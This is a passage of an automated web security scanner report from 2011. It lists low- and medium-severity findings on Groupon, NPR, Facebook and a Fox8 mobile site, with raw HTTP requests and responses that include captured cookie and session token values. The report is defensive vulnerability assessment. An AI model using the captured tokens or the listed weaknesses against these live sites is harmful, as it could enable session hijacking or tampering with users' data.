Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:06 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:06 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:06 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/dallas/
X-Runtime: 11
Cache-Control: no-cache
Content-Length: 96

<html><body>You are being <a href="http://www.groupon.com/dallas/">redirected</a>.</body></html>

6.3. https://www.groupon.com/learn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /learn

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /learn HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/login
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:24 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:24 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:24 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/learn
X-Runtime: 15
Cache-Control: no-cache
Content-Length: 94

<html><body>You are being <a href="http://www.groupon.com/learn">redirected</a>.</body></html>

6.4. https://www.groupon.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /login HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; adchemy_id=q4; conversion_val=; _tpmed=cpc; _tpcid=q4; division=dallas; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; _thepoint=8dd18fc853ae097ffe774ef38887ee55; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.2.9.1304955341313

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:35:57 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:35:57 GMT; HttpOnly
Status: 200
ETag: "43fe666874ea7a2ba3c418d3a85b9227"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36760

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

6.5. https://www.groupon.com/mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /mobile

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/users/new
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; visited=visit_1; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:38:30 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:30 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:30 GMT; HttpOnly
Status: 302
Location: http://www.groupon.com/mobile
X-Runtime: 13
Cache-Control: no-cache
Content-Length: 95

<html><body>You are being <a href="http://www.groupon.com/mobile">redirected</a>.</body></html>

6.6. https://www.groupon.com/users  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /users HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/users/new
Cache-Control: max-age=0
Origin: https://www.groupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55
Content-Length: 231

authenticity_token=ICfp1OvnKSBwXOdEcwa6DN9FNr34UQxyH%2FNwl5Q3Ga4%3D&user%5Bfull_name%5D=&user%5Bemail_address%5D=&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&user%5Baccept_terms%5D=0&user%5Ba
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:13 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: auth_token=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:13 GMT; HttpOnly
Status: 302
Location: https://www.groupon.com/users/new
X-Runtime: 62
Cache-Control: no-cache
Content-Length: 99

<html><body>You are being <a href="https://www.groupon.com/users/new">redirected</a>.</body></html>

6.7. https://www.groupon.com/users/new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /users/new

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /users/new HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; NREUM=s=1304955348574; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.3.9.1304955341313; _chartbeat2=gzdl5mb0frlvfs2p; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:08 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:07 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:08 GMT; HttpOnly
Status: 200
ETag: "bac993c076753d5871cf9db400d8c856"
X-Runtime: 612
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 36677

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...

7. Session token in URL  previous  next
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. http://login.npr.org/openid/embed  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://login.npr.org
Path:   /openid/embed

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /openid/embed?token_url=http%3A%2F%2Fwww.npr.org%2Ftemplates%2Freg%2Flogin-janrain-submit.php HTTP/1.1
Host: login.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=nprorg%3D%2526pid%253D136128917-Mississippi%252520River%252520Could%252520Crest%252520Monday%252520At%252520Memphis%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.npr.org/%25253Futm_source%25253Dtopnav%252526utm_medium%25253Dtopnav%252526utm_campaign%25253Dtopnav%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:39:49 GMT
Content-Type: text/html
Last-Modified: Thu, 05 May 2011 02:07:43 GMT
Connection: keep-alive
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 4792

<!DOCTYPE html>
<html dir="ltr" >
<head>
<title>Sign in - Powered by Janrain</title>
<meta charset="UTF-8" />

<script src="https://s3.amazonaws.com/static.rpxnow.com/js/lib/rpx.js" type
...[SNIP]...

7.2. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=ddb107c4c50eca3b5705114a7d573cb8&app_id=ddb107c4c50eca3b5705114a7d573cb8&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df28449eda%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2b228a95%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df385454f24%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20c6a6a8%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1acce1b18%26origin%3Dhttp%253A%252F%252Fwww.groupon.com%252Ff3597bd174%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6312701c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/privacy
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f20c6a6a8&origin=http%3A%2F%2Fwww.groupon.com%2Ff3597bd174&relation=parent&transport=postmessage&frame=f6312701c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.29.48
X-Cnection: close
Date: Mon, 09 May 2011 15:35:52 GMT
Content-Length: 0


7.3. http://www.npr.org/templates/reg/login.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.npr.org
Path:   /templates/reg/login.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /templates/reg/login.php HTTP/1.1
Host: www.npr.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rosi=75c427ffc47b22e653233d7dc2cb9c00; __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Cache-Control: max-age=0
Expires: Mon, 09 May 2011 15:39:48 GMT
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive
Content-Length: 16829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>NPR: Log in</title
...[SNIP]...
<div class="jrLogin">
<iframe src="http://login.npr.org/openid/embed?token_url=http%3A%2F%2Fwww.npr.org%2Ftemplates%2Freg%2Flogin-janrain-submit.php" scrolling="no" frameBorder="no" allowtransparency="true" style="width:350px;height:240px"></iframe>
...[SNIP]...

8. ASP.NET ViewState without MAC enabled  previous  next
There are 22 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


8.1. http://mobile.fox8live.com/BlackBerry/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /BlackBerry/default.aspx

Request

GET /BlackBerry/default.aspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:41:46 GMT
Content-Length: 4272


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzMjE1OTg0NzBkZA==" />
...[SNIP]...

8.2. http://mobile.fox8live.com/business/story/McDonalds-sales-figure-rises-in-April/R4RfiqAYuEi3vjN-k7UjyA.cspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /business/story/McDonalds-sales-figure-rises-in-April/R4RfiqAYuEi3vjN-k7UjyA.cspx

Request

GET /business/story/McDonalds-sales-figure-rises-in-April/R4RfiqAYuEi3vjN-k7UjyA.cspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:42:13 GMT
Content-Length: 6596


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgIFD2QWAgIDD2QWAgIID2QWAgIBD2QWAgIBD2QWAgIBD2QWAgIBD2QWAmYPZBYCZg9kFgICBQ8PFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWRkZA==" />
...[SNIP]...

8.3. http://mobile.fox8live.com/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /default.aspx

Request

GET /default.aspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:42:00 GMT
Content-Length: 5862


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTE2NTE4MTM1MjNkZA==" />
...[SNIP]...

8.4. http://mobile.fox8live.com/news/local/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /news/local/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Request

GET /news/local/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:42:05 GMT
Content-Length: 10811


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgIFD2QWAgIDD2QWAgIID2QWAgIBD2QWAgIBD2QWAgIBD2QWAgIBD2QWAmYPZBYCZg9kFgICBQ8PFgQeC18hRGF0YUJvdW5kZx4LXyFJdGVtQ291bnQCAWRkZA==" />
...[SNIP]...

8.5. http://mobile.fox8live.com/news/local/story/Mississippi-River-could-crest-Monday-at-Memphis/-sFvNvd1p0GN8i4ye5E8eA.cspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /news/local/story/Mississippi-River-could-crest-Monday-at-Memphis/-sFvNvd1p0GN8i4ye5E8eA.cspx

Request

GET /news/local/story/Mississippi-River-could-crest-Monday-at-Memphis/-sFvNvd1p0GN8i4ye5E8eA.cspx HTTP/1.1
Host: mobile.fox8live.com
Proxy-Connection: keep-alive
Referer: http://mobile.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-IDMCDN: Normal:
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:42:17 GMT
Content-Length: 12654


